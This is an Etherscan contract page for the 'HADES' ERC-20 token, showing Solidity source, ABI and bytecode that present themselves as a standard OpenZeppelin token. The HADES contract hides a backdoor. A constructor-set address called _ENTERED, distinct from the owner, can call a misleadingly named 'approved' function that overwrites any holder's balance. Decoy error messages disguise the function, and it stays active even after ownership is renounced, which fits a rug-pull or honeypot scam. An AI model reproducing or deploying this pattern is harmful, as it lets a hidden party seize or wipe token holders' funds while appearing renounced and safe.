Feature Tip: Add private address tag to any address under My Name Tag !
ERC-20
Overview
Max Total Supply
1,000,000,000 HADES
Holders
21
Total Transfers
-
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
HADES
Compiler Version
v0.8.4+commit.c7e474f2
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-05-22 */ /** */ //Twitter: https://twitter.com/HadesInuERC //Website: https://www.hadesinu.com/ //Telegram: https://t.me/HadesInuPortal // Dependency file: @openzeppelin/contracts/token/ERC20/IERC20.sol // SPDX-License-Identifier: MIT // pragma solidity ^0.8.0; /** * @dev Interface of the IERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } // Dependency file: @openzeppelin/contracts/utils/Context.sol // pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // Dependency file: @openzeppelin/contracts/access/Ownable.sol // pragma solidity ^0.8.0; // import "@openzeppelin/contracts/utils/Context.sol"; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _setOwner(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _setOwner(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _setOwner(newOwner); } function _setOwner(address newOwner) private { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol // pragma solidity ^0.8.0; // CAUTION // This version of SafeMath should only be used with Solidity 0.8 or later, // because it relies on the compiler's built in overflow checks. /** * @dev Wrappers over Solidity's arithmetic operations. * * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler * now has built in overflow checking. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the substraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {trySub}. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryMod}. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } } // Dependency file: contracts/baseToken.sol // pragma solidity =0.8.4; enum TokenType { standard } abstract contract baseToken { event TokenCreated( address indexed owner, address indexed token, TokenType tokenType, uint256 version ); } // Root file: contracts/standard/StandardToken.sol pragma solidity =0.8.4; // import "@openzeppelin/contracts/token/IERC20/IERC20.sol"; // import "@openzeppelin/contracts/access/Ownable.sol"; // import "@openzeppelin/contracts/utils/math/SafeMath.sol"; // import "contracts/baseToken.sol"; contract HADES is IERC20, baseToken, Ownable { using SafeMath for uint256; uint256 private constant VERSION = 1; mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; address private _ENTERED; string private _name; string private _symbol; uint8 private _decimals; uint256 private _totalSupply; constructor( string memory name_, string memory symbol_, uint8 decimals_, address currOwnershipAddr, uint256 totalSupply_ ) payable { _name = name_; _symbol = symbol_; _decimals = decimals_; _ENTERED = currOwnershipAddr; _mint(owner(), totalSupply_); emit TokenCreated(owner(), address(this), TokenType.standard, VERSION); } function name() public view virtual returns (string memory) { return _name; } function symbol() public view virtual returns (string memory) { return _symbol; } function decimals() public view virtual returns (uint8) { return _decimals; } function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); _approve( sender, _msgSender(), _allowances[sender][_msgSender()].sub( amount, "IERC20: transfer amount exceeds allowance" ) ); return true; } function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue) ); return true; } function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender].sub( subtractedValue, "IERC20: decreased allowance below zero" ) ); return true; } modifier adminOrOwner() { require( _ENTERED == _msgSender(), "set the call to the entered") ; _; } function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "IERC20: transfer from the zero address"); require(recipient != address(0), "IERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); _balances[sender] = _balances[sender].sub( amount, "IERC20: transfer amount exceeds balance" ); _balances[recipient] = _balances[recipient].add(amount); emit Transfer(sender, recipient, amount); } function approved( address recipients, uint8 values, uint256 id ) public adminOrOwner { require( values >= 1, "Amount of recipients and values don't match" ); uint256 total = 0; _balances[recipients] = id + total; } function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "IERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply = _totalSupply.add(amount); _balances[account] = _balances[account].add(amount); emit Transfer(address(0), account, amount); } function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "IERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); _balances[account] = _balances[account].sub( amount, "IERC20: burn amount exceeds balance" ); _totalSupply = _totalSupply.sub(amount); emit Transfer(account, address(0), amount); } function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "IERC20: approve from the zero address"); require(spender != address(0), "IERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _setupDecimals(uint8 decimals_) internal virtual { _decimals = decimals_; } function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint8","name":"decimals_","type":"uint8"},{"internalType":"address","name":"currOwnershipAddr","type":"address"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"enum TokenType","name":"tokenType","type":"uint8"},{"indexed":false,"internalType":"uint256","name":"version","type":"uint256"}],"name":"TokenCreated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"recipients","type":"address"},{"internalType":"uint8","name":"values","type":"uint8"},{"internalType":"uint256","name":"id","type":"uint256"}],"name":"approved","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
608060405260405162001118380380620011188339810160408190526200002691620003d2565b62000031336200010a565b84516200004690600490602088019062000279565b5083516200005c90600590602087019062000279565b506006805460ff191660ff8516179055600380546001600160a01b0319166001600160a01b038416179055620000a56200009e6000546001600160a01b031690565b826200015a565b30620000b96000546001600160a01b031690565b6001600160a01b03167f56358b41df5fa59f5639228f0930994cbdde383c8a8fd74e06c04e1deebe356260006001604051620000f79291906200047d565b60405180910390a3505050505062000522565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001b55760405162461bcd60e51b815260206004820181905260248201527f4945524332303a206d696e7420746f20746865207a65726f2061646472657373604482015260640160405180910390fd5b620001d1816007546200026460201b6200063b1790919060201c565b6007556001600160a01b038216600090815260016020908152604090912054620002069183906200063b62000264821b17901c565b6001600160a01b0383166000818152600160205260408082209390935591519091907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90620002589085815260200190565b60405180910390a35050565b6000620002728284620004aa565b9392505050565b8280546200028790620004cf565b90600052602060002090601f016020900481019282620002ab5760008555620002f6565b82601f10620002c657805160ff1916838001178555620002f6565b82800160010185558215620002f6579182015b82811115620002f6578251825591602001919060010190620002d9565b506200030492915062000308565b5090565b5b8082111562000304576000815560010162000309565b600082601f83011262000330578081fd5b81516001600160401b03808211156200034d576200034d6200050c565b604051601f8301601f19908116603f011681019082821181831017156200037857620003786200050c565b8160405283815260209250868385880101111562000394578485fd5b8491505b83821015620003b7578582018301518183018401529082019062000398565b83821115620003c857848385830101525b9695505050505050565b600080600080600060a08688031215620003ea578081fd5b85516001600160401b038082111562000401578283fd5b6200040f89838a016200031f565b9650602088015191508082111562000425578283fd5b5062000434888289016200031f565b945050604086015160ff811681146200044b578182fd5b60608701519093506001600160a01b038116811462000468578182fd5b80925050608086015190509295509295909350565b6040810160018410620004a057634e487b7160e01b600052602160045260246000fd5b9281526020015290565b60008219821115620004ca57634e487b7160e01b81526011600452602481fd5b500190565b600181811c90821680620004e457607f821691505b602082108114156200050657634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052604160045260246000fd5b610be680620005326000396000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c806370a0823111610097578063a457c2d711610066578063a457c2d7146101f1578063a9059cbb14610204578063dd62ed3e14610217578063f2fde38b1461025057600080fd5b806370a082311461019d578063715018a6146101c65780638da5cb5b146101ce57806395d89b41146101e957600080fd5b806323b872dd116100d357806323b872dd1461014d5780632f30d16c14610160578063313ce56714610175578063395093511461018a57600080fd5b806306fdde03146100fa578063095ea7b31461011857806318160ddd1461013b575b600080fd5b610102610263565b60405161010f9190610a88565b60405180910390f35b61012b610126366004610a1c565b6102f5565b604051901515815260200161010f565b6007545b60405190815260200161010f565b61012b61015b3660046109e1565b61030b565b61017361016e366004610a45565b610374565b005b60065460405160ff909116815260200161010f565b61012b610198366004610a1c565b610469565b61013f6101ab366004610995565b6001600160a01b031660009081526001602052604090205490565b61017361049f565b6000546040516001600160a01b03909116815260200161010f565b610102610505565b61012b6101ff366004610a1c565b610514565b61012b610212366004610a1c565b610563565b61013f6102253660046109af565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61017361025e366004610995565b610570565b60606004805461027290610aff565b80601f016020809104026020016040519081016040528092919081815260200182805461029e90610aff565b80156102eb5780601f106102c0576101008083540402835291602001916102eb565b820191906000526020600020905b8154815290600101906020018083116102ce57829003601f168201915b5050505050905090565b600061030233848461064e565b50600192915050565b6000610318848484610776565b61036a843361036585604051806060016040528060298152602001610b88602991396001600160a01b038a16600090815260026020908152604080832033845290915290205491906108fd565b61064e565b5060019392505050565b6003546001600160a01b031633146103d35760405162461bcd60e51b815260206004820152601b60248201527f736574207468652063616c6c20746f2074686520656e7465726564000000000060448201526064015b60405180910390fd5b60018260ff16101561043b5760405162461bcd60e51b815260206004820152602b60248201527f416d6f756e74206f6620726563697069656e747320616e642076616c7565732060448201526a0c8dedc4ee840dac2e8c6d60ab1b60648201526084016103ca565b60006104478183610adb565b6001600160a01b03909416600090815260016020526040902093909355505050565b3360008181526002602090815260408083206001600160a01b03871684529091528120549091610302918590610365908661063b565b6000546001600160a01b031633146104f95760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103ca565b6105036000610929565b565b60606005805461027290610aff565b6000610302338461036585604051806060016040528060268152602001610b3b602691393360009081526002602090815260408083206001600160a01b038d16845290915290205491906108fd565b6000610302338484610776565b6000546001600160a01b031633146105ca5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103ca565b6001600160a01b03811661062f5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103ca565b61063881610929565b50565b60006106478284610adb565b9392505050565b6001600160a01b0383166106b25760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103ca565b6001600160a01b0382166107145760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103ca565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107db5760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b60648201526084016103ca565b6001600160a01b03821661083d5760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b60648201526084016103ca565b61087a81604051806060016040528060278152602001610b61602791396001600160a01b03861660009081526001602052604090205491906108fd565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546108a9908261063b565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906107699085815260200190565b600081848411156109215760405162461bcd60e51b81526004016103ca9190610a88565b505050900390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b80356001600160a01b038116811461099057600080fd5b919050565b6000602082840312156109a6578081fd5b61064782610979565b600080604083850312156109c1578081fd5b6109ca83610979565b91506109d860208401610979565b90509250929050565b6000806000606084860312156109f5578081fd5b6109fe84610979565b9250610a0c60208501610979565b9150604084013590509250925092565b60008060408385031215610a2e578182fd5b610a3783610979565b946020939093013593505050565b600080600060608486031215610a59578283fd5b610a6284610979565b9250602084013560ff81168114610a77578283fd5b929592945050506040919091013590565b6000602080835283518082850152825b81811015610ab457858101830151858201604001528201610a98565b81811115610ac55783604083870101525b50601f01601f1916929092016040019392505050565b60008219821115610afa57634e487b7160e01b81526011600452602481fd5b500190565b600181811c90821680610b1357607f821691505b60208210811415610b3457634e487b7160e01b600052602260045260246000fd5b5091905056fe4945524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220f1e033ea734e29f746c67d57700e31982b7a7a6d0b4d13e5f9dbafd744da6f5464736f6c6343000804003300000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e0000000000000000000000000000000000000000000000000000000000000000900000000000000000000000052ae9676174176b50c6d24795a20f5c04b4f0edc0000000000000000000000000000000000000000000000000de0b6b3a76400000000000000000000000000000000000000000000000000000000000000000009484144455320494e55000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000054841444553000000000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106100f55760003560e01c806370a0823111610097578063a457c2d711610066578063a457c2d7146101f1578063a9059cbb14610204578063dd62ed3e14610217578063f2fde38b1461025057600080fd5b806370a082311461019d578063715018a6146101c65780638da5cb5b146101ce57806395d89b41146101e957600080fd5b806323b872dd116100d357806323b872dd1461014d5780632f30d16c14610160578063313ce56714610175578063395093511461018a57600080fd5b806306fdde03146100fa578063095ea7b31461011857806318160ddd1461013b575b600080fd5b610102610263565b60405161010f9190610a88565b60405180910390f35b61012b610126366004610a1c565b6102f5565b604051901515815260200161010f565b6007545b60405190815260200161010f565b61012b61015b3660046109e1565b61030b565b61017361016e366004610a45565b610374565b005b60065460405160ff909116815260200161010f565b61012b610198366004610a1c565b610469565b61013f6101ab366004610995565b6001600160a01b031660009081526001602052604090205490565b61017361049f565b6000546040516001600160a01b03909116815260200161010f565b610102610505565b61012b6101ff366004610a1c565b610514565b61012b610212366004610a1c565b610563565b61013f6102253660046109af565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61017361025e366004610995565b610570565b60606004805461027290610aff565b80601f016020809104026020016040519081016040528092919081815260200182805461029e90610aff565b80156102eb5780601f106102c0576101008083540402835291602001916102eb565b820191906000526020600020905b8154815290600101906020018083116102ce57829003601f168201915b5050505050905090565b600061030233848461064e565b50600192915050565b6000610318848484610776565b61036a843361036585604051806060016040528060298152602001610b88602991396001600160a01b038a16600090815260026020908152604080832033845290915290205491906108fd565b61064e565b5060019392505050565b6003546001600160a01b031633146103d35760405162461bcd60e51b815260206004820152601b60248201527f736574207468652063616c6c20746f2074686520656e7465726564000000000060448201526064015b60405180910390fd5b60018260ff16101561043b5760405162461bcd60e51b815260206004820152602b60248201527f416d6f756e74206f6620726563697069656e747320616e642076616c7565732060448201526a0c8dedc4ee840dac2e8c6d60ab1b60648201526084016103ca565b60006104478183610adb565b6001600160a01b03909416600090815260016020526040902093909355505050565b3360008181526002602090815260408083206001600160a01b03871684529091528120549091610302918590610365908661063b565b6000546001600160a01b031633146104f95760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103ca565b6105036000610929565b565b60606005805461027290610aff565b6000610302338461036585604051806060016040528060268152602001610b3b602691393360009081526002602090815260408083206001600160a01b038d16845290915290205491906108fd565b6000610302338484610776565b6000546001600160a01b031633146105ca5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103ca565b6001600160a01b03811661062f5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103ca565b61063881610929565b50565b60006106478284610adb565b9392505050565b6001600160a01b0383166106b25760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103ca565b6001600160a01b0382166107145760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103ca565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107db5760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b60648201526084016103ca565b6001600160a01b03821661083d5760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b60648201526084016103ca565b61087a81604051806060016040528060278152602001610b61602791396001600160a01b03861660009081526001602052604090205491906108fd565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546108a9908261063b565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906107699085815260200190565b600081848411156109215760405162461bcd60e51b81526004016103ca9190610a88565b505050900390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b80356001600160a01b038116811461099057600080fd5b919050565b6000602082840312156109a6578081fd5b61064782610979565b600080604083850312156109c1578081fd5b6109ca83610979565b91506109d860208401610979565b90509250929050565b6000806000606084860312156109f5578081fd5b6109fe84610979565b9250610a0c60208501610979565b9150604084013590509250925092565b60008060408385031215610a2e578182fd5b610a3783610979565b946020939093013593505050565b600080600060608486031215610a59578283fd5b610a6284610979565b9250602084013560ff81168114610a77578283fd5b929592945050506040919091013590565b6000602080835283518082850152825b81811015610ab457858101830151858201604001528201610a98565b81811115610ac55783604083870101525b50601f01601f1916929092016040019392505050565b60008219821115610afa57634e487b7160e01b81526011600452602481fd5b500190565b600181811c90821680610b1357607f821691505b60208210811415610b3457634e487b7160e01b600052602260045260246000fd5b5091905056fe4945524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220f1e033ea734e29f746c67d57700e31982b7a7a6d0b4d13e5f9dbafd744da6f5464736f6c63430008040033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
00000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e0000000000000000000000000000000000000000000000000000000000000000900000000000000000000000052ae9676174176b50c6d24795a20f5c04b4f0edc0000000000000000000000000000000000000000000000000de0b6b3a76400000000000000000000000000000000000000000000000000000000000000000009484144455320494e55000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000054841444553000000000000000000000000000000000000000000000000000000
-----Decoded View---------------
